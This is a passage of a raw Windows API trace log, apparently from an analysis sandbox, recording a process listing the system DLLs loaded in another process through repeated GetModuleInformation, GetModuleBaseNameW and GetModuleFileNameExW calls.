hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0051.933] CoTaskMemFree (pv=0x782320) [0051.933] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.933] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0051.935] CoTaskMemFree (pv=0x782320) [0051.935] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x255fc60, cb=0x18 | out: lpmodinfo=0x255fc60*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0051.937] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.937] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0051.939] CoTaskMemFree (pv=0x782320) [0051.939] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.939] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0051.942] CoTaskMemFree (pv=0x782320) [0051.942] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb750000, lpmodinfo=0x2561e20, cb=0x18 | out: lpmodinfo=0x2561e20*(lpBaseOfDll=0x7fefb750000, SizeOfImage=0xac000, EntryPoint=0x7fefb766acc)) returned 1 [0051.944] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.944] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb750000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="audiosrv.dll") returned 0xc [0051.946] CoTaskMemFree (pv=0x782320) [0051.946] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.946] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb750000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")) returned 0x20 [0051.948] CoTaskMemFree (pv=0x782320) [0051.948] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb720000, lpmodinfo=0x2563ff0, cb=0x18 | out: lpmodinfo=0x2563ff0*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0051.950] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.950] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb720000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0051.953] CoTaskMemFree (pv=0x782320) [0051.953] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.953] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb720000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0051.955] CoTaskMemFree (pv=0x782320) [0051.955] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x25661c0, cb=0x18 | out: lpmodinfo=0x25661c0*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0051.957] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.957] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0051.960] CoTaskMemFree (pv=0x782320) [0051.960] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.960] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0051.962] CoTaskMemFree (pv=0x782320) [0051.962] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x25683a8, cb=0x18 | out: lpmodinfo=0x25683a8*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0051.964] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.964] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0051.967] CoTaskMemFree (pv=0x782320) [0051.967] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.967] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0051.970] CoTaskMemFree (pv=0x782320) [0051.970] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x256a790, cb=0x18 | out: lpmodinfo=0x256a790*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0051.973] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.973] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0051.975] CoTaskMemFree (pv=0x782320) [0051.975] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.975] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0051.978] CoTaskMemFree (pv=0x782320) [0051.978] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x256c960, cb=0x18 | out: lpmodinfo=0x256c960*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0051.980] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.980] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0051.982] CoTaskMemFree (pv=0x782320) [0051.982] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.983] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0051.985] CoTaskMemFree (pv=0x782320) [0051.985] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbcc0000, lpmodinfo=0x256eb20, cb=0x18 | out: lpmodinfo=0x256eb20*(lpBaseOfDll=0x7fefbcc0000, SizeOfImage=0x4b000, EntryPoint=0x7fefbccefcc)) returned 1 [0051.987] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.987] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbcc0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="MMDevAPI.DLL") returned 0xc [0051.990] CoTaskMemFree (pv=0x782320) [0051.990] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.990] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbcc0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\MMDevAPI.DLL" (normalized: "c:\\windows\\system32\\mmdevapi.dll")) returned 0x20 [0051.993] CoTaskMemFree (pv=0x782320) [0051.993] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc130000, lpmodinfo=0x2570cf0, cb=0x18 | out: lpmodinfo=0x2570cf0*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0051.995] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.995] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc130000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0051.998] CoTaskMemFree (pv=0x782320) [0051.998] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.998] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc130000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0052.001] CoTaskMemFree (pv=0x782320) [0052.001] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb710000, lpmodinfo=0x2572eb0, cb=0x18 | out: lpmodinfo=0x2572eb0*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0052.003] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.003] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb710000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0052.006] CoTaskMemFree (pv=0x782320) [0052.006] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.006] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb710000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0052.009] CoTaskMemFree (pv=0x782320) [0052.009] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x2575070, cb=0x18 | out: lpmodinfo=0x2575070*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0052.011] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.011] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0052.014] CoTaskMemFree (pv=0x782320) [0052.014] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.014] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0052.017] CoTaskMemFree (pv=0x782320) [0052.017] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x2577230, cb=0x18 | out: lpmodinfo=0x2577230*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0052.020] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.020] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0052.022] CoTaskMemFree (pv=0x782320) [0052.022] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.022] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0052.025] CoTaskMemFree (pv=0x782320) [0052.025] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefada0000, lpmodinfo=0x25793f0, cb=0x18 | out: lpmodinfo=0x25793f0*(lpBaseOfDll=0x7fefada0000, SizeOfImage=0xa000, EntryPoint=0x7fefada1adc)) returned 1 [0052.028] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.028] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefada0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="lmhsvc.dll") returned 0xa [0052.031] CoTaskMemFree (pv=0x782320) [0052.031] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.031] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefada0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")) returned 0x1e [0052.034] CoTaskMemFree (pv=0x782320) [0052.034] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x257b5b0, cb=0x18 | out: lpmodinfo=0x257b5b0*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0052.037] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.037] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0052.041] CoTaskMemFree (pv=0x782320) [0052.041] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.041] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0052.045] CoTaskMemFree (pv=0x782320) [0052.045] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x257d780, cb=0x18 | out: lpmodinfo=0x257d780*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0052.049] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.049] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0052.053] CoTaskMemFree (pv=0x782320) [0052.053] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.053] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0052.057] CoTaskMemFree (pv=0x782320) [0052.057] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefad90000, lpmodinfo=0x257f940, cb=0x18 | out: lpmodinfo=0x257f940*(lpBaseOfDll=0x7fefad90000, SizeOfImage=0x8000, EntryPoint=0x7fefad9284c)) returned 1 [0052.061] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.061] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefad90000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="nrpsrv.DLL") returned 0xa [0052.065] CoTaskMemFree (pv=0x782320) [0052.065] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.065] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefad90000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nrpsrv.DLL" (normalized: "c:\\windows\\system32\\nrpsrv.dll")) returned 0x1e [0052.069] CoTaskMemFree (pv=0x782320) [0052.069] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefad20000, lpmodinfo=0x2581b00, cb=0x18 | out: lpmodinfo=0x2581b00*(lpBaseOfDll=0x7fefad20000, SizeOfImage=0x51000, EntryPoint=0x7fefad2f6c0)) returned 1 [0052.074] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.074] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefad20000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dhcpcore.dll") returned 0xc [0052.079] CoTaskMemFree (pv=0x782320) [0052.079] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.079] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefad20000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")) returned 0x20 [0052.083] CoTaskMemFree (pv=0x782320) [0052.083] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce90000, lpmodinfo=0x2583cd0, cb=0x18 | out: lpmodinfo=0x2583cd0*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0052.085] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.085] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce90000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0052.088] CoTaskMemFree (pv=0x782320) [0052.088] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.088] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce90000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0052.091] CoTaskMemFree (pv=0x782320) [0052.091] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc950000, lpmodinfo=0x2585e90, cb=0x18 | out: lpmodinfo=0x2585e90*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0052.094] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.094] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc950000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="firewallapi.dll") returned 0xf [0052.097] CoTaskMemFree (pv=0x782320) [0052.097] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.097] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc950000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\firewallapi.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0052.099] CoTaskMemFree (pv=0x782320) [0052.099] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x2588060, cb=0x18 | out: lpmodinfo=0x2588060*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0052.102] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.102] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0052.105] CoTaskMemFree (pv=0x782320) [0052.105] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.105] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0052.108] CoTaskMemFree (pv=0x782320) [0052.108] GetModuleInformation (in: hProcess=0x218, hModule=0x7feface0000, lpmodinfo=0x258a238, cb=0x18 | out: lpmodinfo=0x258a238*(lpBaseOfDll=0x7feface0000, SizeOfImage=0x3b000, EntryPoint=0x7feface4520)) returned 1 [0052.110] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.110] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feface0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dhcpcore6.dll") returned 0xd [0052.113] CoTaskMemFree (pv=0x782320) [0052.113] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.113] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feface0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")) returned 0x21 [0052.115] CoTaskMemFree (pv=0x782320) [0052.116] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x258c408, cb=0x18 | out: lpmodinfo=0x258c408*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0052.118] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.118] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="NLAapi.dll") returned 0xa [0052.121] CoTaskMemFree (pv=0x782320) [0052.121] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.121] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NLAapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0052.124] CoTaskMemFree (pv=0x782320) [0052.124] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9160000, lpmodinfo=0x258e5c8, cb=0x18 | out: lpmodinfo=0x258e5c8*(lpBaseOfDll=0x7fef9160000, SizeOfImage=0x15000, EntryPoint=0x7fef91612a0)) returned 1 [0052.126] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.127] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9160000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="napinsp.dll") returned 0xb [0052.129] CoTaskMemFree (pv=0x782320) [0052.129] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.129] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9160000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\napinsp.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")) returned 0x1f [0052.132] CoTaskMemFree (pv=0x782320) [0052.132] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9180000, lpmodinfo=0x2590788, cb=0x18 | out: lpmodinfo=0x2590788*(lpBaseOfDll=0x7fef9180000, SizeOfImage=0x19000, EntryPoint=0x7fef918177c)) returned 1 [0052.135] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0052.135] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9180000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="pnrpnsp.dll") returned 0xb [0052.138] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9180000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")) returned 0x1f [0052.141] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac50000, lpmodinfo=0x2592948, cb=0x18 | out: lpmodinfo=0x2592948*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0052.143] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac50000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0052.146] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac50000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0052.149] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9530000, lpmodinfo=0x2594b18, cb=0x18 | out: lpmodinfo=0x2594b18*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0052.152] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9530000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0052.155] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9530000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0052.158] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9220000, lpmodinfo=0x2596ce8, cb=0x18 | out: lpmodinfo=0x2596ce8*(lpBaseOfDll=0x7fef9220000, SizeOfImage=0xb000, EntryPoint=0x7fef92212e0)) returned 1 [0052.161] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9220000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="winrnr.dll") returned 0xa [0052.164] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9220000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")) returned 0x1e [0052.167] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x2598ea8, cb=0x18 | out: lpmodinfo=0x2598ea8*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0052.170] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0052.173] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0052.176] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x259b068, cb=0x18 | out: lpmodinfo=0x259b068*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0052.179] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0052.182] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0052.186] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x259d228, cb=0x18 | out: lpmodinfo=0x259d228*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0052.189] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0052.192] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0052.195] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6fa0000, lpmodinfo=0x259f3e8, cb=0x18 | out: lpmodinfo=0x259f3e8*(lpBaseOfDll=0x7fef6fa0000, SizeOfImage=0x4f000, EntryPoint=0x7fef6fa2760)) returned 1 [0052.198] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6fa0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="audioses.dll") returned 0xc [0052.201] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6fa0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\audioses.dll" (normalized: "c:\\windows\\system32\\audioses.dll")) returned 0x20 [0052.204] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x25a15b8, cb=0x18 | out: lpmodinfo=0x25a15b8*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0052.207] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0052.211] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0052.214] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x25a3788, cb=0x18 | out: lpmodinfo=0x25a3788*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0052.217] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0052.221] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0052.224] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefacb0000, lpmodinfo=0x25a5958, cb=0x18 | out: lpmodinfo=0x25a5958*(lpBaseOfDll=0x7fefacb0000, SizeOfImage=0x1c000, EntryPoint=0x7fefacb1060)) returned 1 [0052.227] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefacb0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wscsvc.dll") returned 0xa [0052.231] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefacb0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")) returned 0x1e [0052.250] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3600000, lpmodinfo=0x25a7b18, cb=0x18 | out: 